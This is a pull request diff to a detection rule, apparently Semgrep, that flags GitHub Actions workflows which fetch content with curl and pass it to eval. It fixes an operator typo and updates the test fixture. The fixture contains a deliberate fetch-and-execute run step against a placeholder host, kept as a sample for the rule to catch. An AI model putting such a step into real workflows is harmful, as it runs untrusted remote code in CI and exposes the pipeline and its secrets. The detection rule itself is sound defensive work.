### PR TITLE
fix(curl-eval): fix deep exp operator typo

### DIFF
--- a/yaml/github-actions/security/curl-eval.test.yaml
+++ b/yaml/github-actions/security/curl-eval.test.yaml
@@ -21,5 +21,5 @@ jobs:
           blah
           # ruleid: curl-eval
         run: |
-          $DATA=$(curl https://blah.com)
-          eval $DATA
+          CONTENTS=$(curl https://blah.com)
+          eval $CONTENTS

--- a/yaml/github-actions/security/curl-eval.yaml
+++ b/yaml/github-actions/security/curl-eval.yaml
@@ -27,7 +27,7 @@ rules:
           metavariable: $SHELL
           patterns:
             - pattern: |
-                $DATA=<... curl ... >
+                $DATA=<... curl ...>
                 ...
                 eval <... $DATA ...>
     severity: ERROR


### PR DESCRIPTION
As written, this rule matches any `run` block that contains an `eval`
statement, regardless of source.